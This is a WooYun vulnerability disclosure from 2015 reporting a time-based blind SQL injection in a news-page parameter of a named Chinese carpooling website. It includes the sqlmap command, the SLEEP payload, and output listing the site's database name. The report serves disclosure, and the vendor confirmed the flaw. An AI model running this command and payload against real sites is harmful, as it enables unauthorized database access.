当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163140

漏洞标题:哈哈拼车主站sql盲注

相关厂商:chepinhui.com

漏洞作者: Hero

提交时间:2015-12-21 13:44

修复时间:2016-02-01 10:51

公开时间:2016-02-01 10:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

sql注入

详细说明:

http://www.hahapinche.com/News/news_detail?id=660
id参数未过滤

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator>sqlmap.py -u "http://www.hahapinche.com/News/news_detail?
id=660" --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 13:19:47
[13:19:47] [INFO] using 'F:\tools\sqlmap\output\www.hahapinche.com\session' as s
ession file
[13:19:47] [INFO] resuming injection data from session file
[13:19:47] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[13:19:47] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=660 AND SLEEP(5)
---
[13:19:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[13:19:47] [INFO] fetching database names
[13:19:47] [INFO] fetching number of databases
[13:19:47] [INFO] read from file 'F:\tools\sqlmap\output\www.hahapinche.com\sess
ion':
[13:19:47] [INFO] read from file 'F:\tools\sqlmap\output\www.hahapinche.com\sess
ion':
[13:19:47] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[13:19:49] [ERROR] unable to retrieve the number of databases
[13:19:49] [INFO] falling back to current database
[13:19:49] [INFO] fetching current database
[13:19:49] [INFO] read from file 'F:\tools\sqlmap\output\www.hahapinche.com\sess
ion': haha_db
available databases [1]:
[*] haha_db
[13:19:49] [INFO] Fetched data logged to text files under 'F:\tools\sqlmap\outpu
t\www.hahapinche.com'
[*] shutting down at: 13:19:49


hahapinche.png

漏洞证明:

rt

修复方案:

过滤

版权声明:转载请注明来源 Hero@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-21 14:50

厂商回复:

谢谢

最新状态:

暂无